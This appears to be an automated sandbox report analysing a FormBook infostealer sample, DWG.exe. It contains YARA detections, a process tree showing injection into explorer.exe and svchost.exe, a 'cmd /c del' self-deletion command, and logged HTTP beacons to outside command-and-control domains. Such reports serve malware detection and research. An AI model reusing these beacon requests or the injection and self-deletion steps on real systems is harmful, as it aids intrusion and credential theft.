                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.3498175.157.87.20480C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Oct 28, 2021 07:40:58.862319946 CEST6008OUTGET /xzes/?YTspi8lX=hHkh8CC3aQWSbWc+haxkrlzKrETBoK7eA41q+CP6m5nHXq5sq3R+TUUaF/2E5Ug81ukz&MnaP7J=3fjTHZDPJpAt HTTP/1.1
                                    Host: www.thebrandstudiointernational.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Oct 28, 2021 07:40:58.888703108 CEST6008INHTTP/1.1 200 OK
                                    Server: nginx/1.20.1
                                    Date: Thu, 28 Oct 2021 05:40:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Powered-By: PHP/7.1.30
                                    Data Raw: 31 35 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 65 7a 65 20 64 6f 6d 65 69 6e 6e 61 61 6d 20 69 73 20 67 65 72 65 67 69 73 74 72 65 65 72 64 20 64 6f 6f 72 20 65 65 6e 20 6b 6c 61 6e 74 20 76 61 6e 20 59 6f 75 72 68 6f 73 74 69 6e 67 2e 6e 6c 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 74 6f 70 3a 30 70 78 3b 6c 65 66 74 3a 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 61 75 74 6f 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 72 68 6f 73 74 69 6e 67 2e 6e 6c 2f 70 61 72 6b 65 65 72 70 61 67 69 6e 61 2e 68 74 6d 6c 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: 15f<!DOCTYPE html><html><head><title>Deze domeinnaam is geregistreerd door een klant van Yourhosting.nl</title><meta http-equiv="pragma" content="no-cache"></head><body><iframe style="top:0px;left:0px; width:100%; height:100%; position:absolute" frameborder="0" scrolling="auto" src="https://www.yourhosting.nl/parkeerpagina.html"></iframe></body></html>0


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    3192.168.2.349818198.54.117.21580C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Oct 28, 2021 07:41:10.336775064 CEST6010OUTGET /xzes/?YTspi8lX=hsby6OIEBt/ghsMVYLSyJdZ7YeDc2IcIgsMuos52TKAPvq+RR5iGDOsuf8zypfzdpc18&MnaP7J=3fjTHZDPJpAt HTTP/1.1
                                    Host: www.theravewizards.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


                                    Code Manipulations

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    Analysis Process: DWG.exe PID: 6272 Parent PID: 3672

                                    General

                                    Start time:07:39:06
                                    Start date:28/10/2021
                                    Path:C:\Users\user\Desktop\DWG.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\DWG.exe'
                                    Imagebase:0x400000
                                    File size:626688 bytes
                                    MD5 hash:FF882802D113ED02FA070C496F89D797
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: DWG.exe PID: 6240 Parent PID: 6272

                                    General

                                    Start time:07:39:25
                                    Start date:28/10/2021
                                    Path:C:\Users\user\Desktop\DWG.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\DWG.exe
                                    Imagebase:0x400000
                                    File size:626688 bytes
                                    MD5 hash:FF882802D113ED02FA070C496F89D797
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: explorer.exe PID: 3352 Parent PID: 6240

                                    General

                                    Start time:07:39:27
                                    Start date:28/10/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff720ea0000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: svchost.exe PID: 6564 Parent PID: 3352

                                    General

                                    Start time:07:39:46
                                    Start date:28/10/2021
                                    Path:C:\Windows\SysWOW64\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\svchost.exe
                                    Imagebase:0x280000
                                    File size:44520 bytes
                                    MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: cmd.exe PID: 6584 Parent PID: 6564

                                    General

                                    Start time:07:39:50
                                    Start date:28/10/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del 'C:\Users\user\Desktop\DWG.exe'
                                    Imagebase:0xd80000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: conhost.exe PID: 6604 Parent PID: 6584

                                    General

                                    Start time:07:39:51
                                    Start date:28/10/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7f20f0000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Disassembly

                                    Code Analysis

                                    Reset < >

                                      Analysis Process: DWG.exe PID: 6272 Parent PID: 3672 DWG.exeCOMMON

                                      Executed Functions

                                      Function 00411BFD, Relevance: 5892.5, APIs: 12, Strings: 3350, Instructions: 8986memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualProtect.KERNELBASE(004569A8,00008000,00000040,?), ref: 00411C7C
                                      • glGenTextures.OPENGL32(00000001,?), ref: 00411CAE
                                      • glBindTexture.OPENGL32(00000DE1,?), ref: 00411CC0
                                      • glTexParameteri.OPENGL32(00000DE1,00002801,00002601), ref: 00411CD5
                                      • glTexParameteri.OPENGL32(00000DE1,00002800,00002601), ref: 00411CEA
                                      • glTexParameteri.OPENGL32(00000DE1,00002802,00000000), ref: 00411CFC
                                      • glTexParameteri.OPENGL32(00000DE1,00002803,00000000), ref: 00411D0E
                                      • glTexImage2D.OPENGL32(00000DE1,00000000,00001908,000018D2,000000E9,00000000,00001908,00001401,00000000), ref: 00411D38
                                      • glBindTexture.OPENGL32(00000DE1,00000000), ref: 00411D45
                                      • glBegin.OPENGL32(00000000), ref: 00411D4D
                                      • glArrayElement.OPENGL32(00000036), ref: 00411D55
                                      • LineDDA.GDI32(0000000A,0000000D,00000085,00000086,0045B4C8,00000000), ref: 00420F28
                                        • Part of subcall function 00448223: FindResourceA.KERNEL32(?,00000000,00000005), ref: 00448260
                                        • Part of subcall function 00448223: LoadResource.KERNEL32(?,00000000), ref: 00448268
                                        • Part of subcall function 00448223: LockResource.KERNEL32(?), ref: 00448275
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Parameteri$Resource$BindTexture$ArrayBeginElementFindImage2LineLoadLockProtectTexturesVirtual
                                      • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a!@$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k